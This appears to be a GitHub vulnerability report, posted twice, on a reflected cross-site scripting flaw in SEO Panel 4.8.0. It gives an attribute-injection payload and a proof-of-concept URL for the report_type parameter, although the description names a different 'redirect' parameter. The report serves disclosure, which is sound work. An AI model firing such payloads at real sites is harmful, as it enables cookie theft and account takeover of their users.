A cross-site scripting (XSS) issue in the SEO admin login panel version 4.8.0 allows remote attackers to inject JavaScript via the "redirect" parameter.
XSS Payload: 1"autofocus onfocus=alert(1) //"
Vulnerable parameter: report_type
Steps to Reproduce the Issue:
1- Login to SEO admin panel
2- Paste below POC: https://localhost/seopanel/archive.php?from_time=2021-03-18&order_col=url&order_val=DESC&report_type=1"autofocus onfocus=alert(1) //"&search_name=&sec=reportSummary&to_time=2021-03-19&type=&website_id=http://www.example.com
As you can see, XSS is triggered and can send cookies to attacker.
Impact
With the help of xss attacker can perform social engineering on users by redirecting them from real website to fake one. Attacker can steal their cookies leading to account takeover and download a malware on their system, and there are many more attacking scenarios a skilled attacker can perform with xss.
The text was updated successfully, but these errors were encountered:
Hi team,
I would like to report XSS vulnerability.
Description
A cross-site scripting (XSS) issue in the SEO admin login panel version 4.8.0 allows remote attackers to inject JavaScript via the "redirect" parameter.
XSS Payload: 1"autofocus onfocus=alert(1) //"
Vulnerable parameter: report_type
Steps to Reproduce the Issue:
1- Login to SEO admin panel
2- Paste below POC:
https://localhost/seopanel/archive.php?from_time=2021-03-18&order_col=url&order_val=DESC&report_type=1"autofocus onfocus=alert(1) //"&search_name=&sec=reportSummary&to_time=2021-03-19&type=&website_id=http://www.example.comAs you can see, XSS is triggered and can send cookies to attacker.
Video POC: https://drive.google.com/file/d/1yRe3YtSYStd4k6bxC1jSAXlt8aMez1zS/view?usp=sharing
Impact
With the help of xss attacker can perform social engineering on users by redirecting them from real website to fake one. Attacker can steal their cookies leading to account takeover and download a malware on their system, and there are many more attacking scenarios a skilled attacker can perform with xss.
The text was updated successfully, but these errors were encountered: